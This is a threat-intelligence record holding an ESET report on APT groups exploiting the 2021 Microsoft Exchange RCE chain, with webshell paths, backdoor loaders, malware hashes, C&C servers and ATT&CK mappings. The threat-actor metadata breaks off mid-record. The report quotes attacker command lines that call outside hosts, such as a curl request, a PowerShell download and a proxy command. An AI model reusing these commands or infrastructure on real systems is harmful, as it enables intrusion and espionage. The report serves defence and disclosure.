{ "id": "217aeea0-e5e4-4f5e-9b95-7ab38cf818e9", "created_at": "2026-04-06T00:06:40.536184Z", "updated_at": "2026-04-10T03:37:21.660368Z", "deleted_at": null, "sha1_hash": "fac1b6bd2567479aaa03a7dde4069bb2f4470bfb", "title": "Exchange servers under siege from at least 10 APT groups", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 738922, "plain_text": "Exchange servers under siege from at least 10 APT groups\r\nBy Matthieu FaouThomas DupuyMathieu Tartare\r\nArchived: 2026-04-05 18:57:56 UTC\r\nOn 2021-03-02, Microsoft released out-of-band patches for Microsoft Exchange Server 2013, 2016 and 2019. These security\r\nupdates fixed a pre-authentication remote code execution (RCE) vulnerability chain (CVE-2021-26855, CVE-2021-26857,\r\nCVE-2021-26858, and CVE-2021-27065) that allows an attacker to take over any reachable Exchange server, without even\r\nknowing any valid account credentials. We have already detected webshells on more than 5,000 email servers as of the time\r\nof writing, and according to public sources, several important organizations, such as the European Banking Authority,\r\nsuffered from this attack.\r\nESET customers are advised to read the following articles for information related to ESET products:\r\nA Microsoft Exchange saga: How is ESET technology protecting business customers post-exploitation? (ESET Corporate\r\nBlog)\r\nMicrosoft Exchange vulnerabilities discovered and exploited in-the-wild (ESET Customer Advisory)\r\nDoes ESET protect me from the Hafnium zero-day exploit in Microsoft Exchange? (ESET Knowledgebase)\r\nThese vulnerabilities were first discovered by Orange Tsai, a well-known vulnerability researcher, who reported them to\r\nMicrosoft on 2021-01-05. However, according to a blogpost by Volexity, in-the-wild exploitation had already started on\r\n2021-01-03. Thus, if these dates are correct, the vulnerabilities were either independently discovered by two different\r\nvulnerability research teams or that information about the vulnerabilities was somehow obtained by a malicious entity.\r\nMicrosoft also published a blogpost about the early activity of Hafnium.\r\nOn 2021-02-28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by\r\nLuckyMouse, Calypso and the Winnti Group. This suggests that multiple threat actors gained access to the details of the\r\nvulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by\r\nreverse engineering Microsoft updates.\r\nREAD NEXT: Prime targets: Governments shouldn’t go it alone on cybersecurity\r\nFinally, the day after the release of the patch, we started to see many more threat actors (including Tonto Team and\r\nMikroceen) scanning and compromising Exchange servers en masse. Interestingly, all of them are APT groups interested in\r\nespionage, except for one outlier (DLTMiner), which is linked to a known cryptomining campaign. A summary of the\r\ntimeline is shown in Figure 1.\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 1 of 11\n\nFigure 1. Timeline of important events\r\nExploitation statistics\r\nFor the past few days, ESET researchers have been monitoring closely the number of webshell detections for these exploits.\r\nAt the date of publication, we had observed more than 5,000 unique servers in over 115 countries where webshells were\r\nflagged. These numbers utilize ESET telemetry and are (obviously) not complete. Figure 2 illustrates these detections before\r\nand after the patch from Microsoft.\r\nFigure 2. ESET detection of the webshells dropped via CVE-2021-26855 (hourly)\r\nThe heatmap in Figure 3 shows the geographical distribution of the webshell detections, according to ESET telemetry. Due\r\nto mass exploitation, it is likely that it represents the distribution of vulnerable Exchange servers around the world on which\r\nESET security products are installed.\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 2 of 11\n\nFigure 3. Proportion of webshell detections by country (2021-02-28 to 2021-03-09)\r\nFrom RCE to webshells to backdoors\r\nWe have identified more than 10 different threat actors that likely leveraged the recent Microsoft Exchange RCE in order to\r\ninstall implants on victims’ email servers.\r\nOur analysis is based on email servers on which we found webshells in Offline Address Book (OAB) configuration files,\r\nwhich is a specific technique used in the exploitation of the RCE vulnerability and has already been detailed in a Unit 42\r\nblogpost. Unfortunately, we cannot discount the possibility that some threat actors might have hijacked the webshells\r\ndropped by other groups rather than directly using the exploit.\r\nOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware\r\nthrough it. We also noticed in some cases that several threat actors were targeting the same organization.\r\nTick\r\nOn 2021-02-28, Tick (also known as Bronze Butler) compromised the webserver of a company based in East Asia that\r\nprovides IT services. This means that the group likely had access to the exploit prior to the patch’s release – in this case at\r\nleast two days before.\r\nThe attacker used the following name for the first-stage webshell:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\r\nWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group. C\u0026C addresses used by\r\nthis backdoor are www.averyspace[.]net and www.komdsecko[.]net.\r\nTick is an APT group active since as early as 2008 and targeting organizations primarily based in Japan but also in South\r\nKorea, Russia and Singapore amongst others. Its main objective seems to be intellectual property and classified information\r\ntheft. It makes use of various proprietary malware such as Daserf, xxmm and Datper as well as open source RATs such as\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 3 of 11\n\nLilith. Tick is among the APT groups now having access to the ShadowPad backdoor, which was used during Operation\r\nENTRADE documented by Trend Micro.\r\nLuckyMouse\r\nOn 2021-03-01, LuckyMouse compromised the email server of a governmental entity in the Middle East, which means this\r\nAPT group likely had access to the exploit at least one day before the patch release, when it was still a zero day.\r\nLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg\r\nwebshell and issued a GET request to http://34.90.207[.]23/ip using curl. Finally, they attempted to install their SysUpdate\r\n(aka Soldier) modular backdoor that uses the aforementioned IP address as its C\u0026C server.\r\nLuckyMouse, also known as APT27 and Emissary Panda, is a cyberespionage group known to have breached multiple\r\ngovernment networks in Central Asia and the Middle East but also transnational organizations such as International Civil\r\nAviation Organization (ICAO) in 2016. It uses various custom malware families such as HyperBro and SysUpdate.\r\nCalypso\r\nOn 2021-03-01, Calypso compromised the email servers of governmental entities in the Middle East and in South America,\r\nwhich means the group likely had access to the exploit as a zero day, like LuckyMouse and Tick. In the following days,\r\nCalypso operators targeted additional servers of governmental entities and private companies in Africa, Asia and Europe\r\nusing the exploit.\r\nThe attacker used the following names for the first-stage webshell:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\client.aspx\r\nC:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx\r\nAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group\r\n(Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report).\r\nThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers):\r\nnetcfg.exe (SHA-1: 1349EF10BDD4FE58D6014C1043CBBC2E3BB19CC5) using a malicious DLL named\r\nnetcfg.dll (SHA-1: EB8D39CE08B32A07B7D847F6C29F4471CD8264F2)\r\nCLNTCON.exe (SHA-1: B423BEA76F996BF2F69DCC9E75097635D7B7A7AA) using a malicious DLL named\r\nSRVCON.OCX (SHA-1: 30DD3076EC9ABB13C15053234C436406B88FB2B9)\r\niPAQDetetion2.exe (SHA-1: C5D8FEC2C34572F5F2BD4F6B04B75E973FDFEA32) using a malicious DLL named\r\nrapi.dll (SHA-1: 4F0EA31A363CFE0D2BBB4A0B4C5D558A87D8683E)\r\nThe backdoors were configured to connect to the same C\u0026C servers: yolkish[.]com and rawfuns[.]com.\r\nFinally, we also observed a variant of a tool known as Mimikat_ssp that is available on GitHub.\r\nCalypso (which is also tied to XPATH) is a cyberespionage group targeting governmental institutions in Central Asia, the\r\nMiddle East, South America and Asia. Its main implant is a variant of the PlugX RAT.\r\nWebsiic\r\nStarting 2021-03-01, ESET researchers observed a new cluster of activity we have named Websiic, targeting seven email\r\nservers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a\r\ngovernmental body in Eastern Europe. As observed in the cases above, the operators behind this cluster likely had access to\r\nthe exploit before the patch’s release.\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 4 of 11\n\nThis cluster was identified by the presence of a loader as its first stage, generally named google.log or google.aspx, and an\r\nencrypted configuration file, generally named access.log. The loader stops a specific service identified in the config and\r\ncreates a new entry under the Windows service registry HKLM\\SYSTEM\\CurrentControlSet\\Services\\\r\n\u003cservicename\u003e\\Parameters (the service’s filename is provided by the config). It sets two keys ServiceDll and ServiceMain.\r\nThe first one contains the path to a DLL while the latter contains the export to call (INIT in this case). Finally, it restarts the\r\nservice that was stopped at the outset.\r\nWhile the loader was deployed on all victims from this cluster, the second stage (also a loader) was observed on the\r\ncomputer of only one of the victims and was located in C:\\Program Files\\Common Files\\microsoft shared\\WMI\\iiswmi.dll.\r\nThe DLL has an export named INIT that contains the main logic and uses the same XOR encryption loop as well as the\r\nsame technique to dynamically resolve the Windows API names as seen in the first stage. It loads the following DLL\r\n%COMMONPROGRAMFILES%\\System\\websvc.dll with an argument extracted from the registry key\r\nHKLM\\SOFTWARE\\Classes\\Interface\\{6FD0637B-85C6-D3A9-CCE9-65A3F73ADED9}. Unfortunately, the lack of\r\nindicators matching previously known threat actors prevents us from drawing any conclusions or a reasonable hypothesis as\r\nto the group behind these attacks.\r\nSeven victims were flagged by the presence of the first loader and at one of them, the second loader was identified. We have\r\nnot currently tied any known threat actor to Websiic. A recent article from GTSC also briefly describes the same cluster.\r\nWinnti Group\r\nStarting 2021-03-02, a few hours before Microsoft released the patch, the Winnti Group (also known as BARIUM or\r\nAPT41) compromised the email servers of an oil company and a construction equipment company both based in East Asia.\r\nThis indicates that this APT group also had access to the exploit prior to the patch release.\r\nThe attackers started by dropping webshells at the following locations, depending on the victim:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\caches.aspx\r\nC:\\inetpub\\wwwroot\\aspnet_client\\shell.aspx\r\nAt one of the compromised victims we observed a PlugX RAT sample (also known as Korplug) with C\u0026C domain\r\nmm.portomnail[.]com and back.rooter.tk. Note that mm.portomnail[.]com was previously used by the Winnti Group with\r\nShadowPad and the Winnti malware. On the same machine, during the same timeframe, we also observed some malware,\r\nnot yet fully analyzed, using 139.162.123[.]108 as its C\u0026C address but at the time of writing we don’t know whether this is\r\nrelated to the Exchange compromise or not.\r\nAt the second victim, we observed a loader that is highly similar to previous Winnti v4 malware loaders such as that\r\nmentioned in our white paper on the arsenal of the Winnti Group. Like that Winnti v4 loader, this loader is used to decrypt\r\nan encrypted payload from disk and execute it using the following command:\r\nsrv64.exe \u003cDecryption_Key\u003e \u003cEncrypted_Payload_Filename\u003e\r\nwhere \u003cDecryption_key\u003e is the decryption key used to decrypt the payload stored in \u003cEncrypted_Payload_Filename\u003e. Once\r\nexecuted, this loader drops a malicious DLL at the following location:\r\nC:\\Windows\\system32\\oci.dll\r\nThis malicious DLL shares multiple similarities with a previous Winnti implant documented by Trend Micro as well as the\r\nSpyder backdoor recently documented by DrWeb and that we have observed being used by the Winnti Group in the past.\r\nThe C\u0026C address used by this implant is 161.129.64[.]124:443.\r\nAdditionally, we observed various Mimikatz and password dumping tools.\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 5 of 11\n\nThe Winnti Group, active since at least 2012, is responsible for high-profile supply-chain attacks against the video game and\r\nsoftware industries, leading to the distribution of trojanized software (such as CCleaner, ASUS LiveUpdate and multiple\r\nvideo games) that is then used to compromise more victims. It is also known for having compromised various targets in\r\nmultiple different verticals such as healthcare and education.\r\nTonto Team\r\nOn 2021-03-03, Tonto Team (also known as CactusPete) compromised the email servers of a procurement company and of a\r\nconsulting company specialized in software development and cybersecurity, both based in Eastern Europe.\r\nIn that case, the attacker used C:\\inetpub\\wwwroot\\aspnet_client\\dukybySSSS.aspx for the first-stage webshell.\r\nThe attacker then used PowerShell to download their payloads from 77.83.159[.]15. Those payloads consist of a legitimate\r\nand signed Microsoft executable used as a DLL search-order hijacking host and a malicious DLL loaded by that executable.\r\nThe malicious DLL is a ShadowPad loader. The C\u0026C address being used by ShadowPad here is lab.symantecsafe[.]org and\r\nthe communication protocol is HTTPS.\r\nIn addition to ShadowPad, the attacker also made use of a variant of the Bisonal RAT highly similar to a Bisonal variant that\r\nwas previously used during Operation Bitter Biscuit attributed to Tonto Team.\r\nOn one of the compromised machines, the attacker used an LSAS dumper that was also previously used by Tonto Team.\r\nTonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia,\r\nJapan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT\r\ngroups that now has access to the ShadowPad backdoor.\r\nUnattributed ShadowPad activity\r\nStarting 2021-03-03, we observed the compromise of email servers at a software development company based in East Asia\r\nand a real estate company based in the Middle East where ShadowPad was dropped by the attacker and that we were not\r\nable to conclusively attribute to any known groups at the time of writing.\r\nThe attackers used C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx and C:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServerProxy.aspx as first-stage webshells and dropped ShadowPad at\r\nthe following locations:\r\nC:\\Windows\\Help\\mui\\0109\\mscoree.dll\r\nC:\\mscoree.dll\r\nOne of the ShadowPad samples uses soft.mssysinfo[.]xyz as its C\u0026C address using the HTTPS protocol while the second\r\nsample uses ns.rtechs[.]org using the DNS protocol, which is less common.\r\nThe ShadowPad backdoor is a modular backdoor that was exclusive to the Winnti Group until the end of 2019. To the best of\r\nour knowledge, ShadowPad is now used by at least five additional groups: Tick, Tonto Team, KeyBoy, IceFog and TA428.\r\nThe “Opera” Cobalt Strike\r\nOn 2021-03-03 at 04:23 AM UTC, just a few hours after the patch was released, we noticed that another set of malicious\r\nactivities had started. At this point we don’t know if these threat actors had access to the exploit beforehand or reverse\r\nengineered the patch. This corresponds to indicators that were published on Twitter and by FireEye, but we haven’t been\r\nable to link this set to any group we are already tracking.\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 6 of 11\n\nFrom 2021-03-03 to 2021-03-05, ESET telemetry shows this activity targeting around 650 servers, mostly in the US,\r\nGermany, the UK and other European countries. Interestingly, this threat actor was consistent in the naming and location of\r\ntheir first-stage webshell, always using\r\n\u003cExchange_install_directory\u003e\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServerProxy.aspx.\r\nThen on a few selected machines, they executed a PowerShell script, shown in Figure 4, to download additional components\r\nfrom 86.105.18[.]116. The final payload is Cobalt Strike, which uses the same IP address for its C\u0026C server. Cobalt Strike is\r\nloaded via DLL search-order hijacking against a legitimate Opera executable named opera_browser.exe (SHA-1:\r\nAB5AAA34200A3DD2276A20102AB9D7596FDB9A83) using a DLL named opera_browser.dll (SHA-1:\r\n02886F9DAA13F7D9855855048C54F1D6B1231B0A) that decrypts and loads a shellcode from opera_browser.png (SHA-1: 2886F9DAA13F7D9855855048C54F1D6B1231B0A).  We noticed that 89.34.111[.]11 was also used to distribute\r\nmalicious files.\r\nFigure 4. PowerShell script used to download Cobalt Strike\r\nIIS backdoors\r\nStarting 2021-03-03, we observed that on four email servers located in Asia and South America, webshells were used to\r\ninstall so-called IIS backdoors.\r\nWe identified two different malware families:\r\nA modified version of IIS-Raid. It comes from a PoC released on GitHub and documented last year by MDSec.\r\nA variant of Owlproxy, which was documented last year by Cycraft as part of several incidents against Taiwanese\r\ngovernmental agencies.\r\nMikroceen\r\nOn 2021-03-04, the Mikroceen APT group compromised the Exchange server of a utility company in Central Asia, which is\r\nthe region it mainly targets.\r\nMikroceen operators started by dropping webshells in C:\\inetpub\\wwwroot\\aspnet_client\\aspnet_regiis.aspx,\r\n\u003cExchange_install_directory\u003e\\FrontEnd\\HttpProxy\\owa\\auth\\aspnet_error.aspx and\r\nC:\\inetpub\\wwwroot\\aspnet_client\\log_error_9e23efc3.aspx. Then, they downloaded a payload we could not recover from\r\nhttp://46.30.188[.]60/webengine4.dll. We were not able to tie those first steps to Mikroceen with high confidence, but these\r\nindicators appeared only on the specific server where we saw the Mikroceen backdoors a few hours after.\r\nA few hours later, a Mikroceen RAT was dropped in C:\\Users\\Public\\Downloads\\service.exe. Its C\u0026C server is\r\n172.105.18[.]72. Then, this RAT dropped additional tools such as Mimikatz (in C:\\users\\public\\alg.exe), Mimikat_ssp (in\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 7 of 11\n\nC:\\users\\public\\Dump.exe) and a custom proxy (in c:\\Users\\Public\\calcx.exe). The latter was executed with the following\r\ncommand line (exposing another attacker-controlled IP address):\r\ncalcx.exe  300 194.68.44[.]19 c:\\users\\public\\1.log \u003cprivate IP\u003e:3128\r\nThe Mikroceen APT group (aka Vicious Panda) is a threat actor operating since at least 2017. It mainly targets\r\ngovernmental institutions and telcos in Central Asia, Russia and Mongolia. It uses a custom backdoor we've named\r\nMikroceen RAT.\r\nDLTMiner\r\nStarting 2021-03-05 at 02:53 AM UTC, we detected the deployment of PowerShell downloaders on multiple email servers\r\nthat were previously targeted using these Exchange vulnerabilities.\r\nThe first PowerShell script downloads the next stage at the following address http://p.estonine[.]com/p?e. Previous articles\r\nfrom 2019 show similarities between this cluster and a cryptominer campaign. More details about the analysis can be found\r\nin Tencent and Carbon Black blogposts. A more recent Twitter post describes the various compromise steps.\r\nWe were unable to find any correlation in terms of webshells deployed on these servers. It is possible that this group is\r\nhijacking webshells previously installed by other threat groups.\r\nSummary\r\nOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that\r\nmultiple APTs have access to the exploit, and some even did so prior to the patch release. It is still unclear how the\r\ndistribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators,\r\nwill have access to it sooner or later.\r\nIt is now clearly beyond prime time to patch all Exchange servers as soon as possible (see Microsoft guidance and apply\r\nspecial care in following the steps in the “About installation of these updates” section). Even those not directly exposed to\r\nthe internet should be patched because an attacker with low, or unprivileged, access to your LAN can trivially exploit these\r\nvulnerabilities to raise their privileges while compromising an internal (and probably more sensitive) Exchange server, and\r\nthen move laterally from it.\r\nIn case of compromise, one should remove webshells, change credentials and investigate for any additional malicious\r\nactivity.\r\nFinally, this is a very good reminder that complex applications such as Microsoft Exchange or SharePoint should not be\r\nopen to the internet since, in case of mass exploitation, it is very hard, if not impossible, to patch in time.\r\nFor any inquiries, or to make sample submissions related to the subject, contact us at: threatintel@eset.com.\r\nIndicators of Compromise (IoCs)\r\nA plaintext list of Indicators of Compromise (IoCs) and a MISP event can be found in our GitHub repository.\r\nWebshells\r\nESET detects the webshells used in these attacks as JS/Exploit.CVE-2021-26855.Webshell.A and JS/Exploit.CVE-2021-\r\n26855.Webshell.B.\r\nThe ASPX webshells are typically placed in these folders, using a large variety of filenames:\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 8 of 11\n\nC:\\inetpub\\wwwroot\\aspnet_client\\system_web\\\r\n\u003cExchange install directory\u003e\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\\r\n\u003cExchange install directory\u003e\\FrontEnd\\HttpProxy\\owa\\auth\\\r\nMalware files\r\nSHA-1 ESET detection name Details\r\n30DD3076EC9ABB13C15053234C436406B88FB2B9 Win32/Korplug.RT\r\nCalypso loader for\r\nWin32/Korplug.ED\r\nEB8D39CE08B32A07B7D847F6C29F4471CD8264F2 Win32/Korplug.RU\r\nCalypso loader for\r\nWin32/Korplug.ED\r\n4F0EA31A363CFE0D2BBB4A0B4C5D558A87D8683E Win32/Agent.ACUS\r\nCalypso loader for\r\nWin32/Agent.UFX\r\n2075D8E39B7D389F92FD97D97C41939F64822361 Win64/HackTool.Mimikat.A\r\nMimikat_ssp used\r\nby Calypso\r\n02886F9DAA13F7D9855855048C54F1D6B1231B0A Win32/Agent.ACUQ\r\nOpera Cobalt\r\nStrike loader\r\n123CF9013FA73C4E1F8F68905630C8B5B481FCE7 Win64/Mikroceen.AN Mikroceen RAT\r\nB873C80562A0D4C3D0F8507B7B8EC82C4DF9FB07 Win64/HackTool.Mimikat.A\r\nMimikat_ssp used\r\nby Mikroceen\r\n59C507BCBEFCA2E894471EFBCD40B5AAD5BC4AC8 Win32/HackTool.Proxy.A\r\nProxy used by\r\nMikroceen\r\n3D5D32A62F770608B6567EC5D18424C24C3F5798 Win64/Kryptik.CHN\r\nShadowPad\r\nbackdoor used by\r\nTonto Team\r\nAF421B1F5A08499E130D24F448F6D79F7C76AF2B Win64/Riskware.LsassDumper.J\r\nLSASS dumper\r\nused by Tonto\r\nTeam\r\n1DE8CBBF399CBC668B6DD6927CFEE06A7281CDA4 Win32/Agent.ACGZ\r\nPlugX injector\r\nused by the Winnti\r\nGroup\r\nB8D7B850DC185160A24A3EE43606A9EF41D60E80 Win64/Winnti.DA Winnti loader\r\n33C7C049967F21DA0F1431A2D134F4F1DE9EC27E Win64/HackTool.Mimikat.A\r\nMimikatz used by\r\nthe Winnti Group\r\nA0B86104E2D00B3E52BDA5808CCEED9842CE2CEA Win64/HackTool.Mimikat.A\r\nMimikatz used by\r\nthe Winnti Group\r\n281FA52B967B08DBC1B51BAFBFBF7A258FF12E54 Win32/PSWTool.QuarksPwDump.E\r\nPassword dumper\r\nused by the Winnti\r\nGroup\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 9 of 11\n\nSHA-1 ESET detection name Details\r\n46F44B1760FF1DBAB6AAD44DEB1D68BEE0E714EA Win64/Shadowpad.E\r\nUnattributed\r\nShadowPad\r\n195FC90AEE3917C94730888986E34A195C12EA78 Win64/Shadowpad.E\r\nUnattributed\r\nShadowPad\r\n29D8DEDCF19A8691B4A3839B805730DDA9D0B87C PowerShell/TrojanDownloader.Agent.CEK DLTMiner\r\n20546C5A38191D1080B4EE8ADF1E54876BEDFB9E PowerShell/TrojanDownloader.Agent.CEK DLTMiner\r\n84F4AEAB426CE01334FD2DA3A11D981F6D9DCABB Win64/Agent.AKS Websiic\r\n9AFA2AFB838CAF2748D09D013D8004809D48D3E4 Win64/Agent.AKS Websiic\r\n3ED18FBE06D6EF2C8332DB70A3221A00F7251D55 Win64/Agent.AKT Websiic\r\nAA9BA493CB9E9FA6F9599C513EDBCBEE84ECECD6 Win64/Agent.IG IIS Backoor\r\nC\u0026C servers\r\nIP address / domain Details\r\n34.90.207[.]23 LuckyMouse SysUpdate C\u0026C server\r\nyolkish[.]com Calypso C\u0026C server\r\nrawfuns[.]com Calypso C\u0026C server\r\n86.105.18[.]116 “Opera Cobalt Strike” C\u0026C \u0026 distribution server\r\n89.34.111[.]11 “Opera Cobalt Strike” distribution server\r\n172.105.18[.]72 Mikroceen RAT C\u0026C server\r\n194.68.44[.]19 Mikroceen proxy C\u0026C server\r\nwww.averyspace[.]net Tick Delphi backdoor C\u0026C server\r\nwww.komdsecko[.]net Tick Delphi backdoor C\u0026C server\r\n77.83.159[.]15 Tonto Team distribution server\r\nlab.symantecsafe[.]org Tonto Team ShadowPad C\u0026C server\r\nmm.portomnail[.]com Winnti Group PlugX C\u0026C server\r\nback.rooter[.]tk Winnti Group PlugX C\u0026C server\r\n161.129.64[.]124 Winnti malware C\u0026C server\r\nns.rtechs[.]org Unclassified ShadowPad C\u0026C server\r\nsoft.mssysinfo[.]xyz Unclassified ShadowPad C\u0026C server\r\np.estonine[.]com DLTMiner C\u0026C server\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 10 of 11\n\nMITRE ATT\u0026CK techniques\r\nNote 1: This table was built using version 8 of the MITRE ATT\u0026CK framework.\r\nNote 2: This table includes techniques covering the exploitation of the vulnerability and the webshell’s deployment.\r\nTactic ID Name Description\r\nReconnaissance T1595 Active Scanning\r\nAttackers are scanning the internet in order to find vulnerable\r\nMicrosoft Exchange servers.\r\nResource\r\nDevelopment\r\nT1587.004\r\nDevelop\r\nCapabilities:\r\nExploits\r\nAttackers developed or acquired exploits for CVE-2021-\r\n26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-\r\n27065.\r\nInitial Access T1190\r\nExploit Public-Facing\r\nApplication\r\nAttackers exploited vulnerabilities in Microsoft Exchange\r\n2013, 2016 and 2019 (CVE-2021-26855, CVE-2021-26857,\r\nCVE-2021-26858, and CVE-2021-27065) to gain a foothold\r\non the email servers.\r\nExecution T1203\r\nExploitation for\r\nClient Execution\r\nAttackers exploited vulnerabilities in Microsoft Exchange\r\n2013, 2016 and 2019 (CVE-2021-26855, CVE-2021-26857,\r\nCVE-2021-26858, and CVE-2021-27065) to drop an ASPX\r\nwebshell on the compromised email servers.\r\nPersistence T1505.003\r\nServer Software\r\nComponent: Web\r\nShell\r\nAttackers installed China Chopper ASPX webshells in IIS or\r\nExchange folders reachable from the internet.\r\nSource: https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "MITRE", "Malpedia", "ETDA" ], "references": [ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/" ], "report_names": [ "exchange-servers-under-siege-10-apt-groups" ], "threat_actors": [ { "id": "655f7d0b-7ea6-4950-b272-969ab7c27a4b", "created_at": "2022-10-27T08:27:13.133291Z", "updated_at": "2026-04-10T02:00:05.315213Z", "deleted_at": null, "main_name": "BITTER", "aliases": [ "T-APT-17" ], "source_name": "MITRE:BITTER", "tools": [ "ZxxZ" ], "source_id": "MITRE", "reports": null }, { "id": "1aead86d-0c57-4e3b-b464-a69f6de20cde", "created_at": "2023-01-06T13:46:38.318176Z", "updated_at": "2026-04-10T02:00:02.925424Z", "deleted_at": null, "main_name": "DAGGER PANDA", "aliases": [ "UAT-7290", "Red Foxtrot", "IceFog", "RedFoxtrot", "Red Wendigo", "PLA Unit 69010" ], "source_name": "MISPGALAXY:DAGGER PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7c969685-459b-4c93-a788-74108eab6f47", "created_at": "2023-01-06T13:46:39.189751Z", "updated_at": "2026-04-10T02:00:03.241102Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "Red Dev 13", "Silk Typhoon", "MURKY PANDA", "ATK233", "G0125", "Operation Exchange Marauder" ], "source_name": "MISPGALAXY:HAFNIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5bbced13-72f7-40dc-8c41-dcce75bf885e", "created_at": "2022-10-25T15:50:23.695735Z", "updated_at": "2026-04-10T02:00:05.335976Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "Winnti Group" ], "source_name": "MITRE:Winnti Group", "tools": [ "PipeMon", "Winnti for Windows", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "49822165-5541-423d-8808-1c0a9448d588", "created_at": "2022-10-25T16:07:23.384093Z", "updated_at": "2026-04-10T02:00:04.575678Z", "deleted_at": null, "main_name": "Barium", "aliases": [ "Brass Typhoon", "Pigfish", "Starchy Taurus" ], "source_name": "ETDA:Barium", "tools": [ "Agent.dhwf", "Agentemis", "Barlaiy", "BleDoor", "Cobalt Strike", "CobaltStrike", "Destroy RAT", "DestroyRAT", "Kaba", "Korplug", "POISONPLUG", "PlugX", "RbDoor", "RedDelta", "RibDoor", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Winnti", "Xamtrav", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "bbefc37d-475c-4d4d-b80b-7a55f896de82", "created_at": "2022-10-25T15:50:23.571783Z", "updated_at": "2026-04-10T02:00:05.302196Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "BRONZE BUTLER", "REDBALDKNIGHT" ], "source_name": "MITRE:BRONZE BUTLER", "tools": [ "Mimikatz", "build_downer", "cmd", "ABK", "at", "BBK", "schtasks", "down_new", "Daserf", "ShadowPad", "Windows Credential Editor", "gsecdump" ], "source_id": "MITRE", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "58db0213-4872-41fe-8a76-a7014d816c73", "created_at": "2023-01-06T13:46:38.61757Z", "updated_at": "2026-04-10T02:00:03.040816Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "G0131", "PLA Unit 65017", "Earth Akhlut", "TAG-74", "CactusPete", "KARMA PANDA", "BRONZE HUNTLEY", "Red Beifang" ], "source_name": "MISPGALAXY:Tonto Team", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f5c5d5d4-3969-4e34-9982-55144c3908eb", "created_at": "2022-10-25T16:07:24.37846Z", "updated_at": "2026-04-10T02:00:04.965506Z", "deleted_at": null, "main_name": "Vicious Panda", "aliases": [ "Bronze Dudley" ], "source_name": "ETDA:Vicious Panda", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "BBSRAT", "Byeby", "Cmstar", "Enfal", "Lurid", "Pylot", "RoyalRoad", "Travle", "meciv" ], "source_id": "ETDA", "reports": null }, { "id": "da483338-e479-4d74-a6dd-1fb09343fd07", "created_at": "2022-10-25T15:50:23.698197Z", "updated_at": "2026-04-10T02:00:05.355597Z", "deleted_at": null, "main_name": "Tonto Team", "aliases": [ "Tonto Team", "Earth Akhlut", "BRONZE HUNTLEY", "CactusPete", "Karma Panda" ], "source_name": "MITRE:Tonto Team", "tools": [ "Mimikatz", "Bisonal", "ShadowPad", "LaZagne", "NBTscan", "gsecdump" ], "source_id": "MITRE", "reports": null }, { "id": 